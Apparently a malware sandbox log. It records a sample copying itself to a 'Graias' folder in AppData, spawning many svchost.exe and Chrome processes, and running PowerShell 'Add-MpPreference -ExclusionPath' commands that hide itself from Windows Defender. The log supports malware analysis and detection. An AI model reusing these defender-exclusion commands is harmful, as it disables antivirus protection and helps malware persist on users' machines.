                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=852 --field-trial-handle=1972,i,16836352753448976889,2601815521256357393,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1884,i,7301673669103937254,12836756404783810427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1940,i,12539128067224901217,8991374413711119156,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2000,i,15628247129644466505,3875143643089187018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1924,i,6482886242108065281,4105261451375631266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2012,i,2947015941692405239,17280289242752989468,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1972,i,17200434405895777880,14925594255065276775,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1600 --field-trial-handle=1980,i,13945759412545287249,4073186008645904870,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1984,i,120110399101443424,9941541229011483260,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1988,i,15807299402186397352,10536807858062258795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,1442060403194708727,17590615368937411025,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1992,i,14774167980353239420,17590433410553186815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1204 --field-trial-handle=1964,i,9634848512687327071,160386830931210519,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=1992,i,15123479563739650555,17542146906633038749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1596 --field-trial-handle=2032,i,2098739127948043686,10317841462462024608,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,8929845415192330188,781615668034862370,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1960,i,9677392010693155346,11350815433485431755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1968,i,10908976342037239078,6657148638705883583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,15324472771725808384,11056097287078458784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1972,i,1428648053043398560,3532581574471474972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,3981841079913460613,3962020599342444513,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Users\user\Desktop\4XYAW8PbZH.exe "C:\Users\user\Desktop\4XYAW8PbZH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1976,i,9020892517801786784,10645353824597710220,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2300,i,10737837625504977776,1997224637472770813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,2517950207159565068,10782540892853908230,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
